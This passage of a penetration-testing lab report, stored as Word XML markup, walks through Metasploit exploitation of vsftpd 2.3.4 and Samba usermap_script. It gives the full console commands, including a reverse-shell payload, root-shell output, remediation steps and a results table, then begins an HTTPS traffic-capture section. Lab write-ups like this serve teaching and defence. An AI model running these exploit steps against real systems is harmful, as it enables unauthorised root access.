          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2: Metasploit Console — db_nmap Scan (Panel 1), Module Search (Panel 2), Exploit Execution (Panel 3), Root Shell (Panel 4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Exploit 1 — vsftpd 2.3.4 Backdoor (CVE-2011-2523)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd 2.3.4 FTP service on port 21. The vsftpd 2.3.4 release contained a malicious backdoor inserted by an unknown attacker. The backdoor triggers when a username containing the smiley face </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F6F7" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">:)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is sent — opening a root shell on port 6200.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(vsftpd_234_backdoor) &gt; set RHOSTS 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(vsftpd_234_backdoor) &gt; set PAYLOAD cmd/unix/interact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(vsftpd_234_backdoor) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] 192.168.1.100:21 - Backdoor service has been spawned, handling...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] 192.168.1.100:21 - UID: uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2E86AB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Command shell session 1 opened (192.168.1.50:36204 -&gt; 192.168.1.100:6200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="default"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="default"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade to vsftpd 3.x immediately. Block port 21 at the perimeter firewall. Replace FTP with SFTP over SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 Exploit 2 — Samba "Username Map Script" (CVE-2007-2447)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A second exploit was demonstrated against the Samba service, which allows remote code execution by injecting shell metacharacters into the username field during authentication:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(usermap_script) &gt; set RHOSTS 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(usermap_script) &gt; set PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(usermap_script) &gt; set LHOST 192.168.1.50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(usermap_script) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] Started reverse TCP handler on 192.168.1.50:4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E8449"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] Command shell session 2 opened (192.168.1.50:4444 -&gt; 192.168.1.100:39024)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="922B21"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SUCCESS — second root shell opened via Samba port 445. Demonstrates that the target has multiple simultaneous critical vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2007-2447, CVSS 10.0. Affects Samba 3.0.0–3.0.25rc3. Shell metacharacter injection via MS-RPC calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade Samba to 3.0.26+. Apply the username map script fix. Block SMB (445) at the perimeter — never expose SMB to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6 Post-Exploitation Evidence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600"/>
        <w:gridCol w:w="2600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="2C3E5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Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="2C3E5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Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:shd w:fill="2C3E5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Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="2C3E5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Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>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vsftpd Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">unix/ftp/vsftpd_234_backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Session 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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uid=0(root) — port 6200 shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>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Samba Usermap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">multi/samba/usermap_script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Session 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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uid=0(root) — reverse shell port 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 3: Metasploit exploit results summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Encrypted HTTPS Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Capture Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Five minutes of HTTPS traffic were captured on the Kali Linux VM while browsing several HTTPS websites and performing API calls. Wireshark was used for the live capture; the resulting PCAP was then analysed offline by traffic_analyzer.py.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tshark -i eth0 -a duration:300 -w https_capture.pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="4A7C59"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"># Filter in Wireshark: tls &amp;&amp; ip.addr == 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Total packets captured: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3,841</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
